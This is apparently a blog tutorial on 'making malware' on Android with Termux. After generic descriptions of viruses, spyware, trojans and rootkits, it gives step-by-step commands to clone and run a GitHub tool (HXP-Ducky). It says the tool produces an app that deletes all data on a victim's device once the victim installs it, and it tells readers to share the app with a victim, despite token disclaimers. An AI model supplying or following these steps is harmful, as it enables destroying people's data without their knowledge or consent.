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How to install Duck Tool in termux

Malware refers to harmful software, including but not limited to viruses, Trojans, worms, spyware, adware, and ransomware, intended to breach a computer system's security.

Malware is often distributed through malicious code embedded in emails, websites, or applications. These malicious programs can cause a host of issues, ranging from file corruption to the theft of personal data or unauthorized access to a system.


It's imperative to remain cognizant of the potential for malware and take the necessary precautions to safeguard both your personal information and your system from any potential attacks.

How to Make Malware in Android


This article elucidates the process of creating malware on an Android device with the aid of the Termux app. While various kinds of malware exist, we shall focus on a particularly potent variant.

The most prevalent form of malicious software is the virus. Its primary objective is to propagate by infiltrating computers and networks. These nefarious programs can bring about considerable harm by deleting files, corrupting data, or even exfiltrating sensitive information. The most common methods of virus transmission include emails, websites, and other similar vectors. 


Spyware is a type of malware that operates covertly, seeking to obtain sensitive data such as credit card numbers, passwords, and other personal information from a computer or network without the user's consent or knowledge. 

Trojans are another form of malware that pose a significant threat. They are crafted to mimic legitimate programs, but their true intent is to provide attackers with unauthorized access to computer systems or networks. Typically, trojans are utilized to install additional malicious software, including but not limited to, keyloggers or backdoors. 

Rootkits, a form of malware, are programs that provide unauthorized access to a computer or network, thereby enabling bad actors to gain control. These programs can be utilized for various malicious purposes, including data theft and launching attacks. 

To safeguard your device from malware, it's essential to adopt safe computing practices. These include maintaining up-to-date software and operating systems, employing a robust antivirus program, and abstaining from downloading unknown files or clicking on dubious links. Regularly backing up your data also ensures that you have a copy to retrieve in case of a malware attack.


Malware for Android

It's unwise and unethical to create malicious software to prank someone. However, if you're interested in learning about the process and tools involved, you can install a data corruption tool in your Termux app

This tool is designed to corrupt data on a victim's device. It's important to note that using such software to harm others is illegal and can lead to severe consequences.

You have to install this tool in termux and then download this app on your mobile. After that you have to share the app with your victim and when he installs this app all the data from his device will be removed.

Remember one thing, this tool is only for fun, do not use this tool for someone. So, how to make malware? You have to download the termux app and then enter these commands one by one.

Commands

  1. apt update
  2. apt upgrade
  3. pkg install git
  4. pkg install lolcat
  5. git clone https://github.com/hackerxphantom/HXP-Ducky
  6. cd $HOME
  7. cd HXP-DUCKY
  8. ls
  9. bash hxp_ducky.sh

There are two options in this tool, 1 and 2. You can select any of them and hit the enter button to continue. This tool can also be used on Kali Linux. You can use this tool after updating Kali Linux.

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Commands (Kali Linux)
  1. sudo apt-get update && pkg upgrade -y
  2. sudo apt-get install git -y
  3. git clone https://github.com/hackerxphantom/HXP-DUCKY
  4. cd HXP-DUCKY
  5. bash hxp_ducky.sh

If you want to know, how we can use this malware practically, then click on the below button to watch a practical video on this topic.

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